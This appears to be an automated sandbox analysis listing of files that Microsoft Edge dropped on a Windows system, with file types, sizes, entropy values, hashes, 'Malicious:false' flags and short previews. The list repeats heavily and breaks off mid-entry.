                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNljagalll:Ls3valll
                                                                                                                                                                                                                                                                                  MD5:AE4794B65BA66C46BDD64D9B0790677D
                                                                                                                                                                                                                                                                                  SHA1:811324316D1420C9BE22ADF753EBD9ED05AAFE12
                                                                                                                                                                                                                                                                                  SHA-256:B41DEF5828D0444569A1628E05446D1E0CB70877247FC53FCC57D80BEE24BE64
                                                                                                                                                                                                                                                                                  SHA-512:386970991A7C900A7F943066AD0DA696EC4D116E938C370EF2F9E813FFB9B8F7D5D8C9EDB7AB5603F5CF0582A5F34BF3B73924F8261D9A215C71B43BF70A6115
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlwll:Ls3wll
                                                                                                                                                                                                                                                                                  MD5:8651605493A502F02921893C8F8E9AFE
                                                                                                                                                                                                                                                                                  SHA1:417CC6331EFB2D7D42A1A940F035CEE5EC63A9A9
                                                                                                                                                                                                                                                                                  SHA-256:A0C3186090A074E44E46E8DE654397F6808E553D787E1A089A32F605C4A1EC9D
                                                                                                                                                                                                                                                                                  SHA-512:F1F708D930D7BFDC1AC59B094075DD1245810AE03D2919E9341C40486EFDC3130D7E6220A2CAD06E7F2DADB5F87157255A9DE31ACE6490B3F1B8D21F98C229E2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfbpq3N1r5ih/cI9URLl8RotoIMFVvlwhLe4IbONIeTC6XQS0qGqk+Z4uj+t:akjsseiRUHhN6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:88C87BEC95261FDC5422AE7FC1AF4FE5
                                                                                                                                                                                                                                                                                  SHA1:8AB0A15481EA02040E7D3A0BA7490F226DC730A7
                                                                                                                                                                                                                                                                                  SHA-256:856AB8926E5507E7305561CEC9583B6413EEAF29733BF444F13B261A953AF4A0
                                                                                                                                                                                                                                                                                  SHA-512:21B9C3CB1C5A485149EC2BEFB7767C6FC7F7AE04D328F2BF29DDA2E356C89AB90075FCB1286A66A9A7A7A0DE8D076A67D40ED23E5BDCB1499CAC37B1AFF9FCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACeKwJxTYpySIzzlIF3S2+GEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADZpMxX5ZrzZSUSawzsHjKaLI45iFCxkZR4Rt9sNdZiFwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                  MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                  SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                  SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                  SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2037233
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.001534564420981
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:49152:aJr4BfMZRD6FFWWn/O5b3gUS4AuwTVd5idKY467wSvQvhZ8payBjJTIgwsKaZaD0:W
                                                                                                                                                                                                                                                                                  MD5:173F96F8C5E0648BEBE25BB41F4B4CCF
                                                                                                                                                                                                                                                                                  SHA1:A69610ECBB42BD46645459A9E8A4CB9A7E33CE88
                                                                                                                                                                                                                                                                                  SHA-256:BAD624A91AA9F6CF580310662CE4B8E70529C9607E6B09B5CE02F2BBFBB526C4
                                                                                                                                                                                                                                                                                  SHA-512:C63AC79524084DC6818F173B05B7D78D21EFFF69B33F5E27121BBC2149902BCA021A9F1A1EBC6A9FCE39FF299604596EE07F728D482776E012B90AE8BAAA1A98
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........| .*..|.....|. ...|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNlvirlll:Ls30lll
                                                                                                                                                                                                                                                                                  MD5:3323C90A9FCA9885A8404B6791A3C01A
                                                                                                                                                                                                                                                                                  SHA1:93AE8469553F2E46F6DE64A75FBEBA2EF191C8E6
                                                                                                                                                                                                                                                                                  SHA-256:7A2FD383500679578AC7B707F5291057978D220546BD0A6E47ACB545313CBB3F
                                                                                                                                                                                                                                                                                  SHA-512:73AC7C1A92C84BE6C35DB2419818D61A4A5BD0F98CE0AEF9B522FDF571DC287F04D8534C500066D40D007F6F2B3CD1C347801430A93A2DF1AB78C0DA29785FC3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
